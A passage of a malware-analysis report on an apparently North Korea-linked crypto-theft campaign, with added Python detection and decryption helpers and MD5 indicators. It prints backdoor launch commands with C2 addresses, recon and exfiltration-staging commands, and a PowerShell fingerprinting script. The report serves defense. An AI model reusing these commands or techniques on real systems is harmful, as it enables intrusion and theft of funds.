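ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{100,}={0,2}")


def build_sample_docx(template_url="http://tpl.example.invalid/a.dotm",
                      with_pe_image=True):
    """Constructed sample: a minimal OOXML zip with an external template
    relationship (omitted when template_url is None) and, optionally, an
    'image' part whose base64 content hides a PE file behind JPEG magic."""
    rel = ""
    if template_url:
        rel = (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
               f'Target="{template_url}" TargetMode="External"/>')
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/'
            f'2006/relationships">{rel}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
        if with_pe_image:
            blob = b"\xff\xd8\xff\xe0" + b"MZ" + b"\x90" * 120 + b"PE\x00\x00"
            z.writestr("word/media/image1.jpeg", base64.b64encode(blob))
    return buf.getvalue()


def remote_templates(docx_bytes):
    """Return every external attachedTemplate target found in any .rels part."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in REL_RE.findall(z.read(name).decode("utf-8", "replace")):
                attrs = dict(ATTR_RE.findall(rel))
                if (attrs.get("Type") == ATTACHED_TEMPLATE
                        and attrs.get("TargetMode") == "External"):
                    hits.append(attrs.get("Target", ""))
    return hits


def embedded_pe_blobs(docx_bytes):
    """Return part names whose long base64 runs decode to data carrying a PE
    signature, regardless of what the part claims to be (e.g. a JPEG)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            for run in B64_RUN.findall(z.read(name)):
                try:
                    decoded = base64.b64decode(run, validate=True)
                except ValueError:
                    continue
                if decoded.startswith(b"MZ") or b"PE\x00\x00" in decoded:
                    hits.append(name)
                    break
    return hits


def triage(docx_bytes):
    """Verdict dict: either finding alone is enough to pull the file for analysis."""
    templates = remote_templates(docx_bytes)
    pe_parts = embedded_pe_blobs(docx_bytes)
    return {"remote_templates": templates, "pe_carrying_parts": pe_parts,
            "suspicious": bool(templates or pe_parts)}


if __name__ == "__main__":
    print(triage(build_sample_docx()))
```

Run `triage(open(path, "rb").read())` over a mail attachment quarantine; a local (non-External) attachedTemplate is normal for documents built from corporate templates, which is why only External targets are reported. Remember that the cleanup macro described above strips both indicators from the on-disk document after it has run, so this check is for files caught in transit, not for post-infection forensics.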
Note that this group has various methods in their infection arsenal and assembles the infection chain to suit the situation.\n\n### Infection chain #1. Windows shortcut\n\nThe group has been utilizing this infection vector for a long time. The actor sent an archive-type file containing a shortcut file and document to the victim. All archives used for the initial infection vector had a similar structure. The archive contained a document file such as Word, Excel or PDF file that was password protected alongside another file disguised as a text file containing the document's password. This file is in fact a Windows shortcut file used to fetch the next stage payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113619/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_08.png>)\n\n**_Archive file and its contents_**\n\nBefore implanting a Windows executable type backdoor, the malware delivered a Visual Basic Script and Powershell Script through multiple stages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113705/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_09.png>)\n\n**_Infection chain_**\n\nThe fetched VBS file is responsible for fingerprinting the victim by sending basic system information, network adapter information, and a process list. Next, the Powershell agent is delivered in encoded format. 
It also sends the victim's general information to the C2 server and then downloads the next Powershell agent, which is capable of executing commands from the malware operator.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113740/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_10.png>)

**_VBS and Powershell delivery chain_**

Using this Powershell agent, a full-featured backdoor is installed and executed with a command line parameter:

    rundll32.exe %Public%\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l

The malware checks the command line parameter, base64-decoding it and decrypting it with an embedded key. The decrypted data contains:

 * 63429981 63407466 45.238.25[.]2 443

To verify the parameter's legitimacy, the malware XORs the second value with 0x5837 and compares the result with the first value (63407466 XOR 0x5837 = 63429981, so this sample passes). If the values match, the malware uses the decrypted C2 address and port. The malware also loads a configuration file (%Public%\Videos\OfficeIntegrator.dat in this case), decrypting it with RC4. This configuration file contains C2 addresses and the path of the next stage payload to be loaded. The backdoor has rich functionality for controlling infected machines:

 * Directory/file manipulation
 * Process manipulation
 * Registry manipulation
 * Executing commands
 * Updating configuration
 * Stealing stored data from Chrome, PuTTY and WinSCP

These are used to deploy other malware tools to monitor the victim: a keylogger and a screenshot taker.

### Infection chain #2. Weaponized Word document

Another infection chain we've seen started from a malicious Word document. This is where the actor utilized remote template injection (CVE-2017-0199) with an embedded malicious Visual Basic Script. 
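Stepping back to the loader from infection chain #1 for a moment: the following is an added re-implementation (not the malware's code) of its argument check and configuration decryption, written for analysts who want to validate a recovered command line or decrypt a recovered .dat file. The post gives the decrypted argument and the XOR rule, so the check itself is exact; the cipher and key that wrap the argument before base64 are not disclosed, so the function starts from the decrypted string. The RC4 routine is a standard one; the key and the line layout of the sample configuration are assumptions made for the example, since the post only states that the file holds C2 addresses and the next-stage payload path.

```python
"""Re-implementation of the loader's argument check from infection chain #1.

Added example, not the malware's code. The post gives the decrypted argument
('<a> <b> <ip> <port>') and the rule that b XOR 0x5837 must equal a; the
cipher and key that wrap the argument before base64 are not disclosed, so this
starts from the decrypted string. rc4() is a plain RC4 implementation used to
decrypt the configuration file; the key and the 'c2=' / 'payload=' line layout
used for the sample config are constructed here, since the post only states
that the file holds C2 addresses and the next-stage payload path.
"""
XOR_KEY = 0x5837


def parse_loader_argument(decrypted: str):
    """Validate the decrypted rundll32 argument; return (ip, port) or None.

    The defanged '[.]' in the post's sample IP is refanged for convenience."""
    parts = decrypted.split()
    if len(parts) != 4:
        return None
    a, b, ip, port = parts
    if not (a.isdigit() and b.isdigit() and port.isdigit()):
        return None
    if int(b) ^ XOR_KEY != int(a):
        return None  # check fails: argument was not produced by the operator's tooling
    return ip.replace("[.]", "."), int(port)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream XOR; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_config(plaintext: bytes) -> dict:
    """Constructed layout: one 'c2=host:port' or 'payload=path' entry per line."""
    cfg = {"c2": [], "payload": None}
    for line in plaintext.decode("utf-8", "replace").splitlines():
        key, sep, value = line.partition("=")
        if sep and key == "c2":
            cfg["c2"].append(value)
        elif sep and key == "payload":
            cfg["payload"] = value
    return cfg


def decrypt_config(blob: bytes, key: bytes) -> dict:
    """Mirror of the loader's step: RC4-decrypt the .dat file, then parse it."""
    return parse_config(rc4(key, blob))


if __name__ == "__main__":
    # Values from the post: 63407466 ^ 0x5837 == 63429981, so the check passes.
    print(parse_loader_argument("63429981 63407466 45.238.25[.]2 443"))
    sample_key = b"constructed-key"
    encrypted = rc4(sample_key,
                    b"c2=10.0.0.1:443\nc2=10.0.0.2:443\npayload=C:\\Users\\Public\\Videos\\next.dll")
    print(decrypt_config(encrypted, sample_key))
```

The XOR pairing is an integrity check rather than a secret: anyone who knows the constant can forge a valid argument, so its purpose is to stop the DLL from running when launched by an analyst or a sandbox with a wrong or missing parameter. When replaying a real configuration file, the RC4 key has to be recovered from the loader itself; the sample key above is only there to make the example self-contained.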
In one file (MD5: [e26725f34ebcc7fa9976dd07bfbbfba3](<https://opentip.kaspersky.com/e26725f34ebcc7fa9976dd07bfbbfba3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)) the remotely fetched template refers back to the first stage document, reads the encoded payload from it and injects it into a legitimate process.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12113826/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_11.png>)

**_Remote template infection chain_**

In the other case, the document embedded a malicious Visual Basic Script that extracted a Powershell agent onto the victim's system. Going through this initial infection procedure results in a Windows executable payload being installed.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114147/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_12.png>)

**_Infection chain_**

Persistence backdoor #1 is dropped under the Start menu path as its persistence mechanism, and its first export function is invoked with the C2 address as the argument:

    rundll32.exe "%appdata%\microsoft\windows\start menu\programs\maintenance\default.rdp",#1 https://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==

Upon execution, the malware generates a unique installation ID from the hostname, username and current timestamp, which are concatenated and hashed using a simple string hashing algorithm. After sending a beacon to the C2 server, the malware collects general system information and sends it AES-encrypted. The data received from the server is expected to have the following structure:

@ | PROCESS_ID | # | DLL_FILE_SIZE | : | DLL_FILE_DATA
---|---|---|---|---|---

PROCESS_ID indicates the target process into which the malware will inject a new DLL, DLL_FILE_SIZE is the size of the DLL to inject, and DLL_FILE_DATA contains the actual binary executable to inject.

Based on our telemetry, the actor used another type of backdoor. Persistence backdoor #2 is used to silently run an additional executable payload that is received over an encrypted channel from a remote server. The server address is not hardcoded but stored in an encrypted file on disk (%WINDIR%\AppPatch\PublisherPolicy.tms), whose path is hardcoded in the backdoor. The decrypted configuration file has an identical structure to the configuration file used in infection chain #1.

As the above cases show, the actor behind this campaign delivered the final payload through a multi-stage infection, carefully delivering each next stage only after checking the victim's fingerprint. This makes it harder to collect indicators to respond to the attack. At the end of this strict infection chain, a full-featured Windows executable backdoor is installed. This custom backdoor has long been attributed only to the BlueNoroff group, so we strongly believe that the BlueNoroff group is behind this campaign.

## Assets theft

### Collecting credentials

One of the strategies this threat actor usually uses after implanting a full-featured backdoor is the discovery and collection strategy common to APT threat actors. We managed to identify BlueNoroff's hands-on activity on one victim and observed that the group delivered the final payload very selectively. The malware operator mostly relied on Windows commands when performing initial profiling. 
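An added detection example, not from the original post, that turns the command pattern listed below into scoring logic over process-creation events (the shape of Sysmon event 1 or Windows 4688: host, parent image, command line). Two signals are scored: the recon commands themselves, and the operator's habit of wrapping each one as cmd.exe /c "<cmd> >%temp%\TMPxxxx.tmp 2>&1", which is far rarer in interactive administration than the bare commands. The events, host names and the wallet configuration path are constructed; the rundll32.exe parent is an assumption based on the backdoor being launched through rundll32 above.

```python
"""Detection logic for the hands-on profiling pattern listed below.

Added example, not from the original post. It runs over constructed
process-creation events (host, parent image, command line). Two things are
scored: the recon commands themselves, and the operator's habit of wrapping
each one as cmd.exe /c "<cmd> >%temp%\TMPxxxx.tmp 2>&1". The rundll32.exe
parent is an assumption based on the backdoor being launched through rundll32.
"""
import re
from collections import defaultdict

TEMP_REDIRECT = re.compile(r">\s*%temp%\\TMP[0-9A-F]{4}\.tmp\s+2>&1", re.I)
RECON = {
    "whoami": re.compile(r"\bwhoami\b", re.I),
    "ipconfig_all": re.compile(r"\bipconfig\s+/all\b", re.I),
    "query_session": re.compile(r"\bquery\s+session\b", re.I),
    "net_user_domain": re.compile(r"\bnet\s+user\b.*\s/domain\b", re.I),
    "net_localgroup_admins": re.compile(r"\bnet\s+localgroup\s+administrators\b", re.I),
}
STAGING = re.compile(r"\b(xcopy|mkdir|rd)\b.*%public%\\", re.I)
WALLET_CONF = re.compile(r"\btype\b.*crypt.*\.conf\b", re.I)


def classify(cmdline):
    """Tag one command line with the behaviours it exhibits."""
    tags = set()
    if TEMP_REDIRECT.search(cmdline):
        tags.add("temp_redirect")
    for name, rx in RECON.items():
        if rx.search(cmdline):
            tags.add(name)
    if STAGING.search(cmdline):
        tags.add("staging_public")
    if WALLET_CONF.search(cmdline):
        tags.add("wallet_config_read")
    return tags


def score_hosts(events, recon_threshold=3):
    """Aggregate per host. Alert when several distinct recon commands share
    the temp-redirect wrapper, or when wallet-config reads / staging appear."""
    per_host = defaultdict(lambda: {"tags": set(), "rundll32_parent": False})
    for ev in events:
        rec = per_host[ev["host"]]
        rec["tags"] |= classify(ev["cmdline"])
        if ev["parent"].lower().endswith("\\rundll32.exe"):
            rec["rundll32_parent"] = True
    result = {}
    for host, rec in per_host.items():
        recon = sum(1 for t in rec["tags"] if t in RECON)
        wrapped = "temp_redirect" in rec["tags"]
        alert = ((recon >= recon_threshold and wrapped)
                 or "wallet_config_read" in rec["tags"]
                 or "staging_public" in rec["tags"])
        result[host] = {"tags": sorted(rec["tags"]), "recon_count": recon,
                        "rundll32_parent": rec["rundll32_parent"], "alert": alert}
    return result


# Constructed events: command lines follow the listing in the post; host
# names, parent images and the wallet config path are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'cmd.exe /c "query session >%temp%\TMPBFF2.tmp 2>&1"'},
    {"host": "WS01", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'cmd.exe /c "ipconfig /all >%temp%\TMPEEE2.tmp 2>&1"'},
    {"host": "WS01", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'cmd.exe /c "whoami >%temp%\TMP218C.tmp 2>&1"'},
    {"host": "WS01", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'cmd.exe /c "net localgroup administrators >%temp%\TMP9518.tmp 2>&1"'},
    {"host": "WS01", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'cmd.exe /c "type D:\2\Crypt_sample\Crypt_sample.conf >%temp%\TMP496B.tmp 2>&1"'},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "ipconfig /all"'},
]

if __name__ == "__main__":
    for host, verdict in score_hosts(SAMPLE_EVENTS).items():
        print(host, verdict)
```

The threshold-plus-wrapper rule is what keeps a lone help-desk `ipconfig /all` (WS02) quiet while the scripted burst on WS01 alerts; the wallet-config and staging tags alert on their own because they have no routine administrative equivalent. In a real pipeline, add a time window around the aggregation so that commands days apart are not folded into one burst.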
They collected user accounts, IP addresses and session information:

 * cmd.exe /c "query session >%temp%\TMPBFF2.tmp 2>&1"
 * cmd.exe /c "ipconfig /all >%temp%\TMPEEE2.tmp 2>&1"
 * cmd.exe /c "whoami >%temp%\TMP218C.tmp 2>&1"
 * cmd.exe /c "net user [user account] /domain >%temp%\TMP4B7C.tmp 2>&1"
 * cmd.exe /c "net localgroup administrators >%temp%\TMP9518.tmp 2>&1"
 * cmd.exe /c "query session >%temp%\TMPBFF2.tmp 2>&1"
 * cmd.exe /c "ipconfig /all >%temp%\TMPEEE2.tmp 2>&1"

In the collection phase, the malware operator also relied on Windows commands. After finding folders of interest, they copied a folder named 策略档案 (Chinese for "policy file") to the previously created "MM" folder for exfiltration. They also collected a configuration file related to cryptocurrency software in order to extract possible credentials or other account details.

 * cmd.exe /c "mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1"
 * xcopy "%user%\Desktop\[_redacted_]工作文档\MM策略档案" %public%\MM /S /E /Q /Y
 * cmd.exe /c "rd /s /q %public%\MM >%temp%\TMP729D.tmp 2>&1"
 * cmd.exe /c "type D:\2\Crypt_[redacted]_\Crypt_[redacted]_.conf >%temp%\TMP496B.tmp 2>&1"

On one victim, we found that the operators manually copied a file created by one of the monitoring utilities (screenshot or keystroke data) to a staging folder (%public% in the command below) so that it could be sent to an attacker-controlled remote resource.

 * cmd.exe /c "copy "%appdata%\Microsoft\Feeds\Creds_5FADD329.dat" %public%\ >%temp%\TMP11C4.tmp 2>&1"

### Stealing cryptocurrency

In some cases where the attackers realized they had found a prominent target, they carefully monitored the user for weeks or months. 
They collected keystrokes and monitored the user's daily operations, while planning a strategy for financial theft.

If the attackers realize that the target uses a popular browser extension to manage crypto wallets (such as the Metamask extension), they change the extension source from the Web Store to a local directory and replace the core extension component (background.js) with a tampered version. At first, they are interested in monitoring transactions. The screenshot below shows a comparison of two files: a legitimate Metamask background.js file and its compromised variant, with the injected lines of code highlighted in yellow. You can see that in this case they set up monitoring of transactions between a particular sender and recipient address. We believe they have a vast monitoring infrastructure that triggers a notification upon discovering large transfers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114239/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_13.png>)

The details of the transaction are automatically submitted via HTTP to a C2 server:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114300/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_14.png>)

In another case, they realized that the user owned a substantial amount of cryptocurrency, but used a hardware wallet. 
The same method was used to steal funds from that user: they intercepted the transaction process and injected their own logic.

All this sounds easy, but in fact it requires a thorough analysis of the Metamask Chrome extension, which is over 6MB of JavaScript (about 170,000 lines of code), and the implementation of a code injection that rewrites transaction details on demand when the extension is used.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114318/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_15.png>)

This way, when the compromised user transfers funds to another account, the transaction is still signed on the hardware wallet. However, because the action was initiated by the user themselves at exactly the moment they expected it, the user doesn't suspect anything fishy and confirms the transaction on the secure device without paying attention to the transaction details. A user is unlikely to worry much about a small payment where a mistake would be insignificant. The attackers, however, modify not only the recipient address but also push the amount to the limit, essentially draining the account in one move.

The injection is very hard to find manually unless you are very familiar with the Metamask codebase. However, a modification of the Chrome extension leaves a trace: the browser has to be switched to Developer mode, and the Metamask extension is installed from a local directory instead of the online store. If the extension comes from the store, Chrome enforces digital signature validation of the code and guarantees its integrity. 
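The trace just described can be checked without clicking through the extensions page. Below is an added example, not from the original post, that reads a Chrome profile's preference document and reports whether Developer mode is on and whether a watched extension was installed from somewhere other than the Web Store. It assumes Chrome keeps per-extension install metadata under extensions.settings.<id> in the profile's Preferences / Secure Preferences JSON, with location 4 meaning "loaded unpacked from a directory", from_webstore marking Web Store installs and path pointing at the install directory, and that Developer mode is stored as extensions.ui.developer_mode; nkbihfbeogaeaoehlefnkodbefgpgknn is MetaMask's Web Store ID. The two preference documents below are constructed.

```python
"""Audit a Chrome profile for the MetaMask trace described above.

Added example, not from the original post. Assumptions: Chrome keeps
per-extension install metadata in the profile's Preferences / Secure
Preferences JSON under extensions.settings.<id>, with location 4 meaning the
extension was loaded unpacked from a directory, from_webstore marking Web
Store installs and 'path' pointing at the install directory; Developer mode
is stored as extensions.ui.developer_mode. nkbihfbeogaeaoehlefnkodbefgpgknn
is MetaMask's Web Store ID. The preference documents below are constructed.
"""
import json

METAMASK_ID = "nkbihfbeogaeaoehlefnkodbefgpgknn"
LOCATION_UNPACKED = 4  # Chromium Manifest::Location::UNPACKED


def audit_extensions(prefs, watch=(METAMASK_ID,)):
    """Return developer-mode state plus a finding per watched extension that
    was not installed from the Web Store or was loaded from a local folder."""
    ext = prefs.get("extensions", {})
    dev_mode = bool(ext.get("ui", {}).get("developer_mode", False))
    findings = []
    for ext_id, s in ext.get("settings", {}).items():
        if ext_id not in watch:
            continue
        reasons = []
        if s.get("location") == LOCATION_UNPACKED:
            reasons.append("loaded unpacked from %s" % s.get("path", "?"))
        if not s.get("from_webstore", False):
            reasons.append("not marked from_webstore")
        if reasons:
            findings.append({"id": ext_id, "reasons": reasons})
    return {"developer_mode": dev_mode, "findings": findings}


def audit_preferences_file(path, watch=(METAMASK_ID,)):
    """Convenience wrapper for a real profile, e.g. .../User Data/Default/Preferences."""
    with open(path, "r", encoding="utf-8") as fh:
        return audit_extensions(json.load(fh), watch)


# Constructed: a profile where MetaMask was swapped for a local copy.
TAMPERED_PREFS = {"extensions": {
    "ui": {"developer_mode": True},
    "settings": {
        METAMASK_ID: {"location": 4, "from_webstore": False,
                      "path": r"C:\Users\victim\AppData\Local\Temp\metamask"},
        # an unrelated Web Store extension with a made-up ID, for contrast
        "abcdefghijklmnopabcdefghijklmnop": {"location": 1, "from_webstore": True,
                                             "path": r"abcdefghijklmnopabcdefghijklmnop\1.2.3_0"},
    }}}

# Constructed: a profile with a normal Web Store install.
CLEAN_PREFS = {"extensions": {
    "ui": {"developer_mode": False},
    "settings": {METAMASK_ID: {"location": 1, "from_webstore": True,
                               "path": METAMASK_ID + r"\10.0.0_0"}}}}

if __name__ == "__main__":
    print(audit_extensions(TAMPERED_PREFS))
    print(audit_extensions(CLEAN_PREFS))
```

A finding here is a reason to compare the on-disk background.js against a fresh Web Store install rather than proof of tampering by itself, since developers legitimately load extensions unpacked. Secure Preferences is HMAC-protected on Windows, so read it rather than edit it; fixing the problem means removing the unpacked extension and reinstalling from the store.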
So, if you are in doubt, immediately check your Metamask extension and Chrome settings.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114351/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_16.png>)\n\n**_Developer mode enabled in Google Chrome_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114426/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_17.png>)\n\n**_If you use Developer mode, make sure your important extensions come from the Web Store_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114454/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_18.png>)\n\n**_Unless you are a Metamask developer yourself, this may indicate a Trojanized extension_**\n\n## SnatchCrypto's victims\n\nThe target of the SnatchCrypto campaign is not limited to specific countries and continents. This campaign is aimed at various companies that by the nature of their work deal with cryptocurrencies and smart contracts, DeFi, blockchains, and FinTech industry.\n\nAccording to our telemetry, we discovered victims from Russia, Poland, Slovenia, Ukraine, the Czech Republic, China, India, the US, Hong Kong, Singapore, the UAE and Vietnam. However, based on the shortened URL click history and decoy documents, we assess there were more victims of this financially motivated attack campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114552/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_19.png>)\n\n**_BlueNoroff victims_**\n\nIn addition to the above-mentioned countries, we observed uploads of weaponized documents and compromised Metamask extensions from Indonesia, the UK, Sweden, Germany, Bulgaria, Estonia, Russia, Malta and Portugal.\n\n## SnatchCrypto's attribution\n\nWe assess with high confidence that the financially motivated BlueNoroff group is behind this campaign. 
As a result of understanding the SnatchCrypto campaign's full chain of infection, we can identify several overlaps with the BlueNoroff group's previous activities.

### VBA macro authorship

Analysis of the VBA macro from the remote template used during the initial infection revealed that the code matched the style and technique previously used by Clément Labro, an offensive security researcher from the company SCRT based in Morges, Vaud, Switzerland. The original process injection code from the VBA macro hasn't been found in public, so either Clément developed it privately and it later became available to BlueNoroff, or someone adapted his other VBA code, such as [the VBA-RunPE project](<https://github.com/itm4n/VBA-RunPE/blob/master/RunPE.vba>).

### PowerShell scripts overlap

One tool this group relied on heavily is the PowerShell script. Through an initial infection they deployed PowerShell agents on several victims, sending basic system information and executing commands from the control server. 
They have used this PowerShell script continuously, while adding small updates. The fingerprinting function is nearly identical in both versions: apart from the function being renamed from GetBasicInformation to GetBI and the 'PS ' prefix being dropped from the version field, the collected fields and their '|'-separated layout are unchanged.

PowerShell script used in a previous BlueNoroff campaign:

    function GetBasicInformation
    {
    $HostName = [System.Environment]::MachineName;
    $UserName = [System.Environment]::UserName;
    $DomainName = [System.Environment]::UserDomainName;
    $CurrentDir = [System.Environment]::CurrentDirectory;
    $BinPath = [System.Environment]::GetCommandLineArgs()[0];
    $OSVersion = [System.Environment]::OSVersion.VersionString;
    $Is64BitOS = [System.Environment]::Is64BitOperatingSystem;
    $Is64BitProcess = [System.Environment]::Is64BitProcess;
    $PSVersion = 'PS ' + [System.Environment]::Version;
    $BasicInformation = $HostName + '|' + $UserName + '|' + $DomainName + '|' + $CurrentDir + '|' + $BinPath + '|' + $OSVersion + '|' + $Is64BitOS + '|' + $Is64BitProcess + '|' + $PSVersion;
    return $BasicInformation;
    }
    function ProcessCommand
    {

PowerShell script used in the 2021 campaign:

    function GetBI
    {
    $HostName = [System.Environment]::MachineName;
    $UserName = [System.Environment]::UserName;
    $DomainName = [System.Environment]::UserDomainName;
    $CurrentDir = [System.Environment]::CurrentDirectory;
    $BinPath = [System.Environment]::GetCommandLineArgs()[0];
    $OSVersion = [System.Environment]::OSVersion.VersionString;
    $Is64BitOS = [System.Environment]::Is64BitOperatingSystem;
    $Is64BitProcess = [System.Environment]::Is64BitProcess;
    $PSVersion = [System.Environment]::Version;
    $BasicInformation = $HostName + '|' + $UserName + '|' + $DomainName + '|' + $CurrentDir + '|' + $BinPath + '|' + $OSVersion + '|' + $Is64BitOS + '|' + $Is64BitProcess + '|' + $PSVersion;
    return $BasicInformation;
    }
    function ProcessCommand
    {

### Backdoor overlap

Through the complicated infection chain, a Windows executable backdoor is eventually installed on the victim machine. We could only identify this backdoor malware on a few hosts. It has many code similarities with previously known BlueNoroff malware. Using the Kaspersky Threat Attribution Engine (KTAE), we see that the malware binaries used in this campaign have considerable code similarities with known tools of the BlueNoroff group.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114636/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_20.png>)

**_Code similarity of backdoor_**

In addition, we can identify uncommon techniques usually seen in the BlueNoroff group's malware. The group's malware acquires the real C2 address by XORing the resolved IP address with a hardcoded DWORD value. We saw the same technique in our previous BlueNoroff [report](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf>). The malware used in the SnatchCrypto campaign uses the same technique to acquire its real C2 addresses.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/12114706/BlueNoroff_Cryptocurrency_Hunt_Is_Still_On_21.png>)

**_Similar C2 address acquiring scheme_**

In addition, based on the metadata of the Windows shortcut files, we found that the actor behind this campaign is familiar with the Korean operating system environment.

    [String Data]
    Working Directory (UNICODE):    %currentdir%
    Arguments (UNICODE):            hxxps://bit[.]ly/2Q9tfCz
    Icon location (UNICODE):        C:\Windows\notepad.exe
    [Console Code Page]
    Code page: 949 (EUC-KR)

## BlueNoroff's indicators of compromise

**Malicious shortcut files**
033609f8672303feb70a4c0f80243349
2100e6e585f0a2a43f47093b6fabde74
4a3de148b5df41a56bde78a5dcf41975
5af886030204952ae243eedd25dd43c4 Password.txt.lnk
5f761f9aa3c1a76b17f584b9547a01a7 Password.txt.lnk
7a4a0b0f82e63941713ffd97c127dac8 Password.txt.lnk
813203e18dc1cc8c70d36ed691ca0df3
961e6ec465d7354a8316393b30f9c6e9 Gdpr Password.txt.lnk
9ea244f0a0a955e43293e640bb4ee646
a3c61de3938e7599c0199d2778f7d417 Password.txt.lnk
a5d4bfc3eab1a28ffbcba67625d8292e
a94529063c3acdbfa770657e9126b56d
ab095cb9bc84f37a0a655fbc00e5f50e
b52d30d1db40d5d3c375c4a7c8a115c1
dd2569684ca52ed176f1619ecbfa7aaa
dff21849756eca89ebfaa33ed3185d95
e18dd8e61c736cfc6fff86b07a352c12
e546b851ac4fa5a111d10f40260b1466
e6e64c511f935d31a8859e9f3147fe24 Password.txt.lnk
ea7ed84f7936d4cbafa7cec51fe39cf7
f414f6590636037a6ec92a4d951bdf55
4e207d6e930db4293a6d720cf47858fc
5e44deca6209e64f4093beae92db0c93 Password.txt.lnk
84c427e002fd162d596f3f43ce86fd6a Password.txt.lnk
c16977fefbdc825a5c6760d2b4ea3914
e5d12ef32f9bd3235d0ac45013040589
09bca3ddbc55f22577d2f3a7fda22d1c Password.txt.lnk
0eb71e4d2978547bd96221548548e9f0 Password.txt.lnk
da599b0cde613b5512c13f299fec739e Password.txt.lnk
0c9170a2584ceeddb89e4c0f0a2353ed Password.txt.lnk
5053103dd5d075c1dc54edf1f8568098 Password.txt.lnk
536bae311c99a4d46f503c68595d4431 Password.txt.lnk
3078265f207fed66470436da07343732 Password.txt.lnk
15f1ae1fed1b2ea71fdb9661823663c6 Password.txt.lnk
56fe283ca3e1c1667191cc7764c260b6 Password.txt.lnk
850751de7b8e158d86469d22ad1c3101 Password.txt.lnk
1a8282f73f393656996107b6ec038dd5 Password.txt.lnk
2ea2ceab1588810961d2fc545e2f957e Password.txt.lnk
561f70411449b327e3f19d81bb2cea08 Password.txt.lnk
3812cdc4225182326b1425c9f3c2d50b Password.txt.lnk
4274e6dbc2b7aee4ef080d19fff47ce7 Password.txt.lnk
427bdfe4425e6c8e3ea41d89a2f55870 Password.txt.lnk
7a83be17f4628459e120a64fcab70bac Password.txt.lnk
5d662269739f1b81072e4c7e48972420 Password.txt.lnk
244a23172af8720882ae0141292f5c47 Password.txt.lnk
a8e2c94abb4c1e77068a5e2d8943296c Password.txt.lnk
89c26cefa057cf21054e64b5560bf583 Xbox.lnk
805949896d8609412732ee7bfb44900a Password.txt.lnk
a2be99a5aa26155e6e42a17fbe4fd54d Security Bugs in rigs.pdf.lnk
28917b4187b3b181e750bf024c6adf70 readme.txt.lnk
9f8e51f4adc007bb0364dfafb19a8c11 UserAssist.lnk
790a21734604b374cf260d20770bfc96 SALT Lending Opportunities.pdf.lnk
db315d7b0d9e8c9ca0aa6892202d498b Password.txt.lnk
02904e802b5dc2f85eec83e3c1948374 Security Bugs in Operation.pdf.lnk
baebc60beaced775551ec23a691c3da6
302314d503ae88058cb4c33a6ac6b79b Password.txt.lnk
aeac6f569fb9a7d3f32517aa16e430d6 Password.txt.lnk
926DEEAF253636521C26442938013204
8064e00b931c1cab6ba329d665ea599c MSEdge.lnk
bcb4a8f190f2124be57496649078e0ae
